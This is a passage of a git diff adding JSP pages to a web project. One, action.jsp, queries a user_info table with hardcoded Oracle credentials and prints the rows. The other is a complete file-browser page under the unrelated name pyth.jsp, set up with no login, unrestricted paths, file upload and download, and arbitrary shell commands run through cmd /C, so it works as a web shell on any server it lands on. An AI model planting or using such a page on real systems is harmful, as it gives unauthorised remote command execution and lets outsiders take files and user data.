    +<% +//========================================================================================== + } +} +%> + + \ No newline at end of file diff --git a/jsp/action.jsp b/jsp/action.jsp new file mode 100644 index 0000000..f4c11ae --- /dev/null +++ b/jsp/action.jsp @@ -0,0 +1,50 @@ +<%@ page contentType="text/html;charset=gb2312"%> +<%@ page import="java.lang.*"%> +<%@ page import="java.sql.*"%> +<%@ page import="java.util.*"%> +<%@ page import="java.io.*"%> + + + +xxx + + + + + + + + +<%Class.forName("oracle.jdbc.driver.OracleDriver").newInstance(); +String url="jdbc:oracle:thin:@localhost:1521:orcl"; +String user="oracle_admin"; +String password="oracle_password"; +Connection conn= DriverManager.getConnection(url,user,password); +Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE); +String sql="SELECT 1,2,3,4,5,6,7,8,9,10 from user_info"; +ResultSet rs=stmt.executeQuery(sql); +while(rs.next()) {%> + + + + + + + + + + + + +<%}%> +<%rs.close(); +stmt.close(); +conn.close(); +%> + + \ No newline at end of file diff --git a/jsp/pyth.jsp b/jsp/pyth.jsp new file mode 100644 index 0000000..2bac9d1 --- /dev/null +++ b/jsp/pyth.jsp @@ -0,0 +1,1934 @@ +<%-- + jsp File browser 1.2 + Copyright (C) 2003-2006 Boris von Loesch + This program is free software; you can redistribute it and/or modify it under + the terms of the GNU General Public License as published by the + Free Software Foundation; either version 2 of the License, or (at your option) + any later version. + This program is distributed in the hope that it will be useful, but + WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or + FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. + You should have received a copy of the GNU General Public License along with + this program; if not, write to the + Free Software Foundation, Inc., + 59 Temple Place, Suite 330, + Boston, MA 02111-1307 USA + - Description: jsp File browser v1.2 -- This JSP program allows remote web-based + file access and manipulation. You can copy, create, move and delete files. + Text files can be edited and groups of files and folders can be downloaded + as a single zip file that's created on the fly. + - Credits: Taylor Bastien, David Levine, David Cowan, Lieven Govaerts +--%> +<%@page import="java.util.*, + java.net.*, + java.text.*, + java.util.zip.*, + java.io.*" +%> +<%! + //FEATURES + private static final boolean NATIVE_COMMANDS = true; + /** + *If true, all operations (besides upload and native commands) + *which change something on the file system are permitted + */ + private static final boolean READ_ONLY = false; + //If true, uploads are allowed even if READ_ONLY = true + private static final boolean ALLOW_UPLOAD = true; + + //Allow browsing and file manipulation only in certain directories + private static final boolean RESTRICT_BROWSING = false; + //If true, the user is allowed to browse only in RESTRICT_PATH, + //if false, the user is allowed to browse all directories besides RESTRICT_PATH + private static final boolean RESTRICT_WHITELIST = false; + //Paths, sperated by semicolon + //private static final String RESTRICT_PATH = "C:\\CODE;E:\\"; //Win32: Case important!! + private static final String RESTRICT_PATH = "/etc;/var"; + + //The refresh time in seconds of the upload monitor window + private static final int UPLOAD_MONITOR_REFRESH = 2; + //The number of colums for the edit field + private static final int EDITFIELD_COLS = 85; + //The number of rows for the edit field + private static final int EDITFIELD_ROWS = 30; + //Open a new window to view a file + private static final boolean USE_POPUP = true; + /** + * If USE_DIR_PREVIEW = true, then for every directory a tooltip will be + * created (hold the mouse over the link) with the first DIR_PREVIEW_NUMBER entries. + * This can yield to performance issues. Turn it off, if the directory loads to slow. + */ + private static final boolean USE_DIR_PREVIEW = false; + private static final int DIR_PREVIEW_NUMBER = 10; + /** + * The name of an optional CSS Stylesheet file + */ + private static final String CSS_NAME = "Browser.css"; + /** + * The compression level for zip file creation (0-9) + * 0 = No compression + * 1 = Standard compression (Very fast) + * ... + * 9 = Best compression (Very slow) + */ + private static final int COMPRESSION_LEVEL = 1; + /** + * The FORBIDDEN_DRIVES are not displayed on the list. This can be usefull, if the + * server runs on a windows platform, to avoid a message box, if you try to access + * an empty removable drive (See KNOWN BUGS in Readme.txt). + */ + private static final String[] FORBIDDEN_DRIVES = {"a:\\"}; + + /** + * Command of the shell interpreter and the parameter to run a programm + */ + private static final String[] COMMAND_INTERPRETER = {"cmd", "/C"}; // Dos,Windows + //private static final String[] COMMAND_INTERPRETER = {"/bin/sh","-c"}; // Unix + + /** + * Max time in ms a process is allowed to run, before it will be terminated + */ + private static final long MAX_PROCESS_RUNNING_TIME = 30 * 1000; //30 seconds + + //Button names + private static final String SAVE_AS_ZIP = "Download selected files as (z)ip"; + private static final String RENAME_FILE = "(R)ename File"; + private static final String DELETE_FILES = "(Del)ete selected files"; + private static final String CREATE_DIR = "Create (D)ir"; + private static final String CREATE_FILE = "(C)reate File"; + private static final String MOVE_FILES = "(M)ove Files"; + private static final String COPY_FILES = "Cop(y) Files"; + private static final String LAUNCH_COMMAND = "(L)aunch external program"; + private static final String UPLOAD_FILES = "Upload"; + + //Normally you should not change anything after this line + //---------------------------------------------------------------------------------- + //Change this to locate the tempfile directory for upload (not longer needed) + private static String tempdir = "."; + private static String VERSION_NR = "1.2"; + private static DateFormat dateFormat = DateFormat.getDateTimeInstance(); + + public class UplInfo { + + public long totalSize; + public long currSize; + public long starttime; + public boolean aborted; + + public UplInfo() { + totalSize = 0l; + currSize = 0l; + starttime = System.currentTimeMillis(); + aborted = false; + } + + public UplInfo(int size) { + totalSize = size; + currSize = 0; + starttime = System.currentTimeMillis(); + aborted = false; + } + + public String getUprate() { + long time = System.currentTimeMillis() - starttime; + if (time != 0) { + long uprate = currSize * 1000 / time; + return convertFileSize(uprate) + "/s"; + } + else return "n/a"; + } + + public int getPercent() { + if (totalSize == 0) return 0; + else return (int) (currSize * 100 / totalSize); + } + + public String getTimeElapsed() { + long time = (System.currentTimeMillis() - starttime) / 1000l; + if (time - 60l >= 0){ + if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m"; + else return time / 60 + ":0" + (time % 60) + "m"; + } + else return time<10 ? "0" + time + "s": time + "s"; + } + + public String getTimeEstimated() { + if (currSize == 0) return "n/a"; + long time = System.currentTimeMillis() - starttime; + time = totalSize * time / currSize; + time /= 1000l; + if (time - 60l >= 0){ + if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m"; + else return time / 60 + ":0" + (time % 60) + "m"; + } + else return time<10 ? "0" + time + "s": time + "s"; + } + + } + + public class FileInfo { + + public String name = null, clientFileName = null, fileContentType = null; + private byte[] fileContents = null; + public File file = null; + public StringBuffer sb = new StringBuffer(100); + + public void setFileContents(byte[] aByteArray) { + fileContents = new byte[aByteArray.length]; + System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length); + } + } + + public static class UploadMonitor { + + static Hashtable uploadTable = new Hashtable(); + + static void set(String fName, UplInfo info) { + uploadTable.put(fName, info); + } + + static void remove(String fName) { + uploadTable.remove(fName); + } + + static UplInfo getInfo(String fName) { + UplInfo info = (UplInfo) uploadTable.get(fName); + return info; + } + } + + // A Class with methods used to process a ServletInputStream + public class HttpMultiPartParser { + + //private final String lineSeparator = System.getProperty("line.separator", "\n"); + private final int ONE_MB = 1024 * 1; + + public Hashtable processData(ServletInputStream is, String boundary, String saveInDir, + int clength) throws IllegalArgumentException, IOException { + if (is == null) throw new IllegalArgumentException("InputStream"); + if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException( + "\"" + boundary + "\" is an illegal boundary indicator"); + boundary = "--" + boundary; + StringTokenizer stLine = null, stFields = null; + FileInfo fileInfo = null; + Hashtable dataTable = new Hashtable(5); + String line = null, field = null, paramName = null; + boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0); + boolean isFile = false; + if (saveFiles) { // Create the required directory (including parent dirs) + File f = new File(saveInDir); + f.mkdirs(); + } + line = getLine(is); + if (line == null || !line.startsWith(boundary)) throw new IOException( + "Boundary not found; boundary = " + boundary + ", line = " + line); + while (line != null) { + if (line == null || !line.startsWith(boundary)) return dataTable; + line = getLine(is); + if (line == null) return dataTable; + stLine = new StringTokenizer(line, ";\r\n"); + if (stLine.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in second line"); + line = stLine.nextToken().toLowerCase(); + if (line.indexOf("form-data") < 0) throw new IllegalArgumentException( + "Bad data in second line"); + stFields = new StringTokenizer(stLine.nextToken(), "=\""); + if (stFields.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in second line"); + fileInfo = new FileInfo(); + stFields.nextToken(); + paramName = stFields.nextToken(); + isFile = false; + if (stLine.hasMoreTokens()) { + field = stLine.nextToken(); + stFields = new StringTokenizer(field, "=\""); + if (stFields.countTokens() > 1) { + if (stFields.nextToken().trim().equalsIgnoreCase("filename")) { + fileInfo.name = paramName; + String value = stFields.nextToken(); + if (value != null && value.trim().length() > 0) { + fileInfo.clientFileName = value; + isFile = true; + } + else { + line = getLine(is); // Skip "Content-Type:" line + line = getLine(is); // Skip blank line + line = getLine(is); // Skip blank line + line = getLine(is); // Position to boundary line + continue; + } + } + } + else if (field.toLowerCase().indexOf("filename") >= 0) { + line = getLine(is); // Skip "Content-Type:" line + line = getLine(is); // Skip blank line + line = getLine(is); // Skip blank line + line = getLine(is); // Position to boundary line + continue; + } + } + boolean skipBlankLine = true; + if (isFile) { + line = getLine(is); + if (line == null) return dataTable; + if (line.trim().length() < 1) skipBlankLine = false; + else { + stLine = new StringTokenizer(line, ": "); + if (stLine.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in third line"); + stLine.nextToken(); // Content-Type + fileInfo.fileContentType = stLine.nextToken(); + } + } + if (skipBlankLine) { + line = getLine(is); + if (line == null) return dataTable; + } + if (!isFile) { + line = getLine(is); + if (line == null) return dataTable; + dataTable.put(paramName, line); + // If parameter is dir, change saveInDir to dir + if (paramName.equals("dir")) saveInDir = line; + line = getLine(is); + continue; + } + try { + UplInfo uplInfo = new UplInfo(clength); + UploadMonitor.set(fileInfo.clientFileName, uplInfo); + OutputStream os = null; + String path = null; + if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir, + fileInfo.clientFileName)); + else os = new ByteArrayOutputStream(ONE_MB); + boolean readingContent = true; + byte previousLine[] = new byte[2 * ONE_MB]; + byte temp[] = null; + byte currentLine[] = new byte[2 * ONE_MB]; + int read, read3; + if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) { + line = null; + break; + } + while (readingContent) { + if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) { + line = null; + uplInfo.aborted = true; + break; + } + if (compareBoundary(boundary, currentLine)) { + os.write(previousLine, 0, read - 2); + line = new String(currentLine, 0, read3); + break; + } + else { + os.write(previousLine, 0, read); + uplInfo.currSize += read; + temp = currentLine; + currentLine = previousLine; + previousLine = temp; + read = read3; + }//end else + }//end while + os.flush(); + os.close(); + if (!saveFiles) { + ByteArrayOutputStream baos = (ByteArrayOutputStream) os; + fileInfo.setFileContents(baos.toByteArray()); + } + else fileInfo.file = new File(path); + dataTable.put(paramName, fileInfo); + uplInfo.currSize = uplInfo.totalSize; + }//end try + catch (IOException e) { + throw e; + } + } + return dataTable; + } + + /** + * Compares boundary string to byte array + */ + private boolean compareBoundary(String boundary, byte ba[]) { + if (boundary == null || ba == null) return false; + for (int i = 0; i < boundary.length(); i++) + if ((byte) boundary.charAt(i) != ba[i]) return false; + return true; + } + + /** Convenience method to read HTTP header lines */ + private synchronized String getLine(ServletInputStream sis) throws IOException { + byte b[] = new byte[1024]; + int read = sis.readLine(b, 0, b.length), index; + String line = null; + if (read != -1) { + line = new String(b, 0, read); + if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1); + } + return line; + } + + public String getFileName(String dir, String fileName) throws IllegalArgumentException { + String path = null; + if (dir == null || fileName == null) throw new IllegalArgumentException( + "dir or fileName is null"); + int index = fileName.lastIndexOf('/'); + String name = null; + if (index >= 0) name = fileName.substring(index + 1); + else name = fileName; + index = name.lastIndexOf('\\'); + if (index >= 0) fileName = name.substring(index + 1); + path = dir + File.separator + fileName; + if (File.separatorChar == '/') return path.replace('\\', File.separatorChar); + else return path.replace('/', File.separatorChar); + } + } //End of class HttpMultiPartParser + + /** + * This class is a comparator to sort the filenames and dirs + */ + class FileComp implements Comparator { + + int mode; + int sign; + + FileComp() { + this.mode = 1; + this.sign = 1; + } + + /** + * @param mode sort by 1=Filename, 2=Size, 3=Date, 4=Type + * The default sorting method is by Name + * Negative mode means descending sort + */ + FileComp(int mode) { + if (mode < 0) { + this.mode = -mode; + sign = -1; + } + else { + this.mode = mode; + this.sign = 1; + } + } + + public int compare(Object o1, Object o2) { + File f1 = (File) o1; + File f2 = (File) o2; + if (f1.isDirectory()) { + if (f2.isDirectory()) { + switch (mode) { + //Filename or Type + case 1: + case 4: + return sign + * f1.getAbsolutePath().toUpperCase().compareTo( + f2.getAbsolutePath().toUpperCase()); + //Filesize + case 2: + return sign * (new Long(f1.length()).compareTo(new Long(f2.length()))); + //Date + case 3: + return sign + * (new Long(f1.lastModified()) + .compareTo(new Long(f2.lastModified()))); + default: + return 1; + } + } + else return -1; + } + else if (f2.isDirectory()) return 1; + else { + switch (mode) { + case 1: + return sign + * f1.getAbsolutePath().toUpperCase().compareTo( + f2.getAbsolutePath().toUpperCase()); + case 2: + return sign * (new Long(f1.length()).compareTo(new Long(f2.length()))); + case 3: + return sign + * (new Long(f1.lastModified()).compareTo(new Long(f2.lastModified()))); + case 4: { // Sort by extension + int tempIndexf1 = f1.getAbsolutePath().lastIndexOf('.'); + int tempIndexf2 = f2.getAbsolutePath().lastIndexOf('.'); + if ((tempIndexf1 == -1) && (tempIndexf2 == -1)) { // Neither have an extension + return sign + * f1.getAbsolutePath().toUpperCase().compareTo( + f2.getAbsolutePath().toUpperCase()); + } + // f1 has no extension + else if (tempIndexf1 == -1) return -sign; + // f2 has no extension + else if (tempIndexf2 == -1) return sign; + // Both have an extension + else { + String tempEndf1 = f1.getAbsolutePath().toUpperCase() + .substring(tempIndexf1); + String tempEndf2 = f2.getAbsolutePath().toUpperCase() + .substring(tempIndexf2); + return sign * tempEndf1.compareTo(tempEndf2); + } + } + default: + return 1; + } + } + } + } + + /** + * Wrapperclass to wrap an OutputStream around a Writer + */ + class Writer2Stream extends OutputStream { + + Writer out; + + Writer2Stream(Writer w) { + super(); + out = w; + } + + public void write(int i) throws IOException { + out.write(i); + } + + public void write(byte[] b) throws IOException { + for (int i = 0; i < b.length; i++) { + int n = b[i]; + //Convert byte to ubyte + n = ((n >>> 4) & 0xF) * 16 + (n & 0xF); + out.write(n); + } + } + + public void write(byte[] b, int off, int len) throws IOException { + for (int i = off; i < off + len; i++) { + int n = b[i]; + n = ((n >>> 4) & 0xF) * 16 + (n & 0xF); + out.write(n); + } + } + } //End of class Writer2Stream + + static Vector expandFileList(String[] files, boolean inclDirs) { + Vector v = new Vector(); + if (files == null) return v; + for (int i = 0; i < files.length; i++) + v.add(new File(URLDecoder.decode(files[i]))); + for (int i = 0; i < v.size(); i++) { + File f = (File) v.get(i); + if (f.isDirectory()) { + File[] fs = f.listFiles(); + for (int n = 0; n < fs.length; n++) + v.add(fs[n]); + if (!inclDirs) { + v.remove(i); + i--; + } + } + } + return v; + } + + /** + * Method to build an absolute path + * @param dir the root dir + * @param name the name of the new directory + * @return if name is an absolute directory, returns name, else returns dir+name + */ + static String getDir(String dir, String name) { + if (!dir.endsWith(File.separator)) dir = dir + File.separator; + File mv = new File(name); + String new_dir = null; + if (!mv.isAbsolute()) { + new_dir = dir + name; + } + else new_dir = name; + return new_dir; + } + + /** + * This Method converts a byte size in a kbytes or Mbytes size, depending on the size + * @param size The size in bytes + * @return String with size and unit + */ + static String convertFileSize(long size) { + int divisor = 1; + String unit = "bytes"; + if (size >= 1024 * 1024) { + divisor = 1024 * 1024; + unit = "MB"; + } + else if (size >= 1024) { + divisor = 1024; + unit = "KB"; + } + if (divisor == 1) return size / divisor + " " + unit; + String aftercomma = "" + 100 * (size % divisor) / divisor; + if (aftercomma.length() == 1) aftercomma = "0" + aftercomma; + return size / divisor + "." + aftercomma + " " + unit; + } + + /** + * Copies all data from in to out + * @param in the input stream + * @param out the output stream + * @param buffer copy buffer + */ + static void copyStreams(InputStream in, OutputStream out, byte[] buffer) throws IOException { + copyStreamsWithoutClose(in, out, buffer); + in.close(); + out.close(); + } + + /** + * Copies all data from in to out + * @param in the input stream + * @param out the output stream + * @param buffer copy buffer + */ + static void copyStreamsWithoutClose(InputStream in, OutputStream out, byte[] buffer) + throws IOException { + int b; + while ((b = in.read(buffer)) != -1) + out.write(buffer, 0, b); + } + + /** + * Returns the Mime Type of the file, depending on the extension of the filename + */ + static String getMimeType(String fName) { + fName = fName.toLowerCase(); + if (fName.endsWith(".jpg") || fName.endsWith(".jpeg") || fName.endsWith(".jpe")) return "image/jpeg"; + else if (fName.endsWith(".gif")) return "image/gif"; + else if (fName.endsWith(".pdf")) return "application/pdf"; + else if (fName.endsWith(".htm") || fName.endsWith(".html") || fName.endsWith(".shtml")) return "text/html"; + else if (fName.endsWith(".avi")) return "video/x-msvideo"; + else if (fName.endsWith(".mov") || fName.endsWith(".qt")) return "video/quicktime"; + else if (fName.endsWith(".mpg") || fName.endsWith(".mpeg") || fName.endsWith(".mpe")) return "video/mpeg"; + else if (fName.endsWith(".zip")) return "application/zip"; + else if (fName.endsWith(".tiff") || fName.endsWith(".tif")) return "image/tiff"; + else if (fName.endsWith(".rtf")) return "application/rtf"; + else if (fName.endsWith(".mid") || fName.endsWith(".midi")) return "audio/x-midi"; + else if (fName.endsWith(".xl") || fName.endsWith(".xls") || fName.endsWith(".xlv") + || fName.endsWith(".xla") || fName.endsWith(".xlb") || fName.endsWith(".xlt") + || fName.endsWith(".xlm") || fName.endsWith(".xlk")) return "application/excel"; + else if (fName.endsWith(".doc") || fName.endsWith(".dot")) return "application/msword"; + else if (fName.endsWith(".png")) return "image/png"; + else if (fName.endsWith(".xml")) return "text/xml"; + else if (fName.endsWith(".svg")) return "image/svg+xml"; + else if (fName.endsWith(".mp3")) return "audio/mp3"; + else if (fName.endsWith(".ogg")) return "audio/ogg"; + else return "text/plain"; + } + + /** + * Converts some important chars (int) to the corresponding html string + */ + static String conv2Html(int i) { + if (i == '&') return "&"; + else if (i == '<') return "<"; + else if (i == '>') return ">"; + else if (i == '"') return """; + else return "" + (char) i; + } + + /** + * Converts a normal string to a html conform string + */ + static String conv2Html(String st) { + StringBuffer buf = new StringBuffer(); + for (int i = 0; i < st.length(); i++) { + buf.append(conv2Html(st.charAt(i))); + } + return buf.toString(); + } + + /** + * Starts a native process on the server + * @param command the command to start the process + * @param dir the dir in which the process starts + */ + static String startProcess(String command, String dir) throws IOException { + StringBuffer ret = new StringBuffer(); + String[] comm = new String[3]; + comm[0] = COMMAND_INTERPRETER[0]; + comm[1] = COMMAND_INTERPRETER[1]; + comm[2] = command; + long start = System.currentTimeMillis(); + try { + //Start process + Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir)); + //Get input and error streams + BufferedInputStream ls_in = new BufferedInputStream(ls_proc.getInputStream()); + BufferedInputStream ls_err = new BufferedInputStream(ls_proc.getErrorStream()); + boolean end = false; + while (!end) { + int c = 0; + while ((ls_err.available() > 0) && (++c <= 1000)) { + ret.append(conv2Html(ls_err.read())); + } + c = 0; + while ((ls_in.available() > 0) && (++c <= 1000)) { + ret.append(conv2Html(ls_in.read())); + } + try { + ls_proc.exitValue(); + //if the process has not finished, an exception is thrown + //else + while (ls_err.available() > 0) + ret.append(conv2Html(ls_err.read())); + while (ls_in.available() > 0) + ret.append(conv2Html(ls_in.read())); + end = true; + } + catch (IllegalThreadStateException ex) { + //Process is running + } + //The process is not allowed to run longer than given time. + if (System.currentTimeMillis() - start > MAX_PROCESS_RUNNING_TIME) { + ls_proc.destroy(); + end = true; + ret.append("!!!! Process has timed out, destroyed !!!!!"); + } + try { + Thread.sleep(50); + } + catch (InterruptedException ie) {} + } + } + catch (IOException e) { + ret.append("Error: " + e); + } + return ret.toString(); + } + + /** + * Converts a dir string to a linked dir string + * @param dir the directory string (e.g. /usr/local/httpd) + * @param browserLink web-path to Browser.jsp + */ + static String dir2linkdir(String dir, String browserLink, int sortMode) { + File f = new File(dir); + StringBuffer buf = new StringBuffer(); + while (f.getParentFile() != null) { + if (f.canRead()) { + String encPath = URLEncoder.encode(f.getAbsolutePath()); + buf.insert(0, "" + conv2Html(f.getName()) + File.separator + ""); + } + else buf.insert(0, conv2Html(f.getName()) + File.separator); + f = f.getParentFile(); + } + if (f.canRead()) { + String encPath = URLEncoder.encode(f.getAbsolutePath()); + buf.insert(0, "" + conv2Html(f.getAbsolutePath()) + ""); + } + else buf.insert(0, f.getAbsolutePath()); + return buf.toString(); + } + + /** + * Returns true if the given filename tends towards a packed file + */ + static boolean isPacked(String name, boolean gz) { + return (name.toLowerCase().endsWith(".zip") || name.toLowerCase().endsWith(".jar") + || (gz && name.toLowerCase().endsWith(".gz")) || name.toLowerCase() + .endsWith(".war")); + } + + /** + * If RESTRICT_BROWSING = true this method checks, whether the path is allowed or not + */ + static boolean isAllowed(File path, boolean write) throws IOException{ + if (READ_ONLY && write) return false; + if (RESTRICT_BROWSING) { + StringTokenizer stk = new StringTokenizer(RESTRICT_PATH, ";"); + while (stk.hasMoreTokens()){ + if (path!=null && path.getCanonicalPath().startsWith(stk.nextToken())) + return RESTRICT_WHITELIST; + } + return !RESTRICT_WHITELIST; + } + else return true; + } + + //--------------------------------------------------------------------------------------------------------------- + + %> +<% + //Get the current browsing directory + request.setAttribute("dir", request.getParameter("dir")); + // The browser_name variable is used to keep track of the URI + // of the jsp file itself. It is used in all link-backs. + final String browser_name = request.getRequestURI(); + final String FOL_IMG = ""; + boolean nohtml = false; + boolean dir_view = true; + //Get Javascript + if (request.getParameter("Javascript") != null) { + dir_view = false; + nohtml = true; + //Tell the browser that it should cache the javascript + response.setHeader("Cache-Control", "public"); + Date now = new Date(); + SimpleDateFormat sdf = new SimpleDateFormat("EEE, d MMM yyyy HH:mm:ss z", Locale.US); + response.setHeader("Expires", sdf.format(new Date(now.getTime() + 1000 * 60 * 60 * 24*2))); + response.setHeader("Content-Type", "text/javascript"); + %> + <%// This section contains the Javascript used for interface elements %> + var check = false; + <%// Disables the checkbox feature %> + function dis(){check = true;} + + var DOM = 0, MS = 0, OP = 0, b = 0; + <%// Determine the browser type %> + function CheckBrowser(){ + if (b == 0){ + if (window.opera) OP = 1; + // Moz or Netscape + if(document.getElementById) DOM = 1; + // Micro$oft + if(document.all && !OP) MS = 1; + b = 1; + } + } + <%// Allows the whole row to be selected %> + function selrow (element, i){ + var erst; + CheckBrowser(); + if ((OP==1)||(MS==1)) erst = element.firstChild.firstChild; + else if (DOM==1) erst = element.firstChild.nextSibling.firstChild; + <%// MouseIn %> + if (i==0){ + if (erst.checked == true) element.className='mousechecked'; + else element.className='mousein'; + } + <%// MouseOut %> + else if (i==1){ + if (erst.checked == true) element.className='checked'; + else element.className='mouseout'; + } + <% // MouseClick %> + else if ((i==2)&&(!check)){ + if (erst.checked==true) element.className='mousein'; + else element.className='mousechecked'; + erst.click(); + } + else check=false; + } + <%// Filter files and dirs in FileList%> + function filter (begriff){ + var suche = begriff.value.toLowerCase(); + var table = document.getElementById("filetable"); + var ele; + for (var r = 1; r < table.rows.length; r++){ + ele = table.rows[r].cells[1].innerHTML.replace(/<[^>]+>/g,""); + if (ele.toLowerCase().indexOf(suche)>=0 ) + table.rows[r].style.display = ''; + else table.rows[r].style.display = 'none'; + } + } + <%//(De)select all checkboxes%> + function AllFiles(){ + for(var x=0;x < document.FileList.elements.length;x++){ + var y = document.FileList.elements[x]; + var ytr = y.parentNode.parentNode; + var check = document.FileList.selall.checked; + if(y.name == 'selfile' && ytr.style.display != 'none'){ + if (y.disabled != true){ + y.checked = check; + if (y.checked == true) ytr.className = 'checked'; + else ytr.className = 'mouseout'; + } + } + } + } + + function shortKeyHandler(_event){ + if (!_event) _event = window.event; + if (_event.which) { + keycode = _event.which; + } else if (_event.keyCode) { + keycode = _event.keyCode; + } + var t = document.getElementById("text_Dir"); + //z + if (keycode == 122){ + document.getElementById("but_Zip").click(); + } + //r, F2 + else if (keycode == 113 || keycode == 114){ + var path = prompt("Please enter new filename", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_Ren").click(); + } + //c + else if (keycode == 99){ + var path = prompt("Please enter filename", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_NFi").click(); + } + //d + else if (keycode == 100){ + var path = prompt("Please enter directory name", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_NDi").click(); + } + //m + else if (keycode == 109){ + var path = prompt("Please enter move destination", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_Mov").click(); + } + //y + else if (keycode == 121){ + var path = prompt("Please enter copy destination", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_Cop").click(); + } + //l + else if (keycode == 108){ + document.getElementById("but_Lau").click(); + } + //Del + else if (keycode == 46){ + document.getElementById("but_Del").click(); + } + } + + function popUp(URL){ + fname = document.getElementsByName("myFile")[0].value; + if (fname != "") + window.open(URL+"?first&uplMonitor="+encodeURIComponent(fname),"","width=400,height=150,resizable=yes,depend=yes") + } + + document.onkeypress = shortKeyHandler; +<% } + // View file + else if (request.getParameter("file") != null) { + File f = new File(request.getParameter("file")); + if (!isAllowed(f, false)) { + request.setAttribute("dir", f.getParent()); + request.setAttribute("error", "You are not allowed to access "+f.getAbsolutePath()); + } + else if (f.exists() && f.canRead()) { + if (isPacked(f.getName(), false)) { + //If zipFile, do nothing here + } + else{ + String mimeType = getMimeType(f.getName()); + response.setContentType(mimeType); + if (mimeType.equals("text/plain")) response.setHeader( + "Content-Disposition", "inline;filename=\"temp.txt\""); + else response.setHeader("Content-Disposition", "inline;filename=\"" + + f.getName() + "\""); + BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f)); + byte buffer[] = new byte[8 * 1024]; + out.clearBuffer(); + OutputStream out_s = new Writer2Stream(out); + copyStreamsWithoutClose(fileInput, out_s, buffer); + fileInput.close(); + out_s.flush(); + nohtml = true; + dir_view = false; + } + } + else { + request.setAttribute("dir", f.getParent()); + request.setAttribute("error", "File " + f.getAbsolutePath() + + " does not exist or is not readable on the server"); + } + } + // Download selected files as zip file + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(SAVE_AS_ZIP))) { + Vector v = expandFileList(request.getParameterValues("selfile"), false); + //Check if all files in vector are allowed + String notAllowedFile = null; + for (int i = 0;i < v.size(); i++){ + File f = (File) v.get(i); + if (!isAllowed(f, false)){ + notAllowedFile = f.getAbsolutePath(); + break; + } + } + if (notAllowedFile != null){ + request.setAttribute("error", "You are not allowed to access " + notAllowedFile); + } + else if (v.size() == 0) { + request.setAttribute("error", "No files selected"); + } + else { + File dir_file = new File("" + request.getAttribute("dir")); + int dir_l = dir_file.getAbsolutePath().length(); + response.setContentType("application/zip"); + response.setHeader("Content-Disposition", "attachment;filename=\"rename_me.zip\""); + out.clearBuffer(); + ZipOutputStream zipout = new ZipOutputStream(new Writer2Stream(out)); + zipout.setComment("Created by jsp File Browser v. " + VERSION_NR); + zipout.setLevel(COMPRESSION_LEVEL); + for (int i = 0; i < v.size(); i++) { + File f = (File) v.get(i); + if (f.canRead()) { + zipout.putNextEntry(new ZipEntry(f.getAbsolutePath().substring(dir_l + 1))); + BufferedInputStream fr = new BufferedInputStream(new FileInputStream(f)); + byte buffer[] = new byte[0xffff]; + copyStreamsWithoutClose(fr, zipout, buffer); + /* int b; + while ((b=fr.read())!=-1) zipout.write(b);*/ + fr.close(); + zipout.closeEntry(); + } + } + zipout.finish(); + out.flush(); + nohtml = true; + dir_view = false; + } + } + // Download file + else if (request.getParameter("downfile") != null) { + String filePath = request.getParameter("downfile"); + File f = new File(filePath); + if (!isAllowed(f, false)){ + request.setAttribute("dir", f.getParent()); + request.setAttribute("error", "You are not allowed to access " + f.getAbsoluteFile()); + } + else if (f.exists() && f.canRead()) { + response.setContentType("application/octet-stream"); + response.setHeader("Content-Disposition", "attachment;filename=\"" + f.getName() + + "\""); + response.setContentLength((int) f.length()); + BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f)); + byte buffer[] = new byte[8 * 1024]; + out.clearBuffer(); + OutputStream out_s = new Writer2Stream(out); + copyStreamsWithoutClose(fileInput, out_s, buffer); + fileInput.close(); + out_s.flush(); + nohtml = true; + dir_view = false; + } + else { + request.setAttribute("dir", f.getParent()); + request.setAttribute("error", "File " + f.getAbsolutePath() + + " does not exist or is not readable on the server"); + } + } + if (nohtml) return; + //else + // If no parameter is submitted, it will take the path from jsp file browser + if (request.getAttribute("dir") == null) { + String path = null; + if (application.getRealPath(request.getRequestURI()) != null) { + File f = new File(application.getRealPath(request.getRequestURI())).getParentFile(); + //This is a hack needed for tomcat + while (f != null && !f.exists()) + f = f.getParentFile(); + if (f != null) + path = f.getAbsolutePath(); + } + if (path == null) { // handle the case where we are not in a directory (ex: war file) + path = new File(".").getAbsolutePath(); + } + //Check path + if (!isAllowed(new File(path), false)){ + //TODO Blacklist + if (RESTRICT_PATH.indexOf(";")<0) path = RESTRICT_PATH; + else path = RESTRICT_PATH.substring(0, RESTRICT_PATH.indexOf(";")); + } + request.setAttribute("dir", path); + }%> + + + + + + + +<% + //If a cssfile exists, it will take it + String cssPath = null; + if (application.getRealPath(request.getRequestURI()) != null) cssPath = new File( + application.getRealPath(request.getRequestURI())).getParent() + + File.separator + CSS_NAME; + if (cssPath == null) cssPath = application.getResource(CSS_NAME).toString(); + if (new File(cssPath).exists()) { +%> + + <%} + else if (request.getParameter("uplMonitor") == null) {%> + + <%} + + //Check path + if (!isAllowed(new File((String)request.getAttribute("dir")), false)){ + request.setAttribute("error", "You are not allowed to access " + request.getAttribute("dir")); + } + //Upload monitor + else if (request.getParameter("uplMonitor") != null) {%> + <% + String fname = request.getParameter("uplMonitor"); + //First opening + boolean first = false; + if (request.getParameter("first") != null) first = true; + UplInfo info = new UplInfo(); + if (!first) { + info = 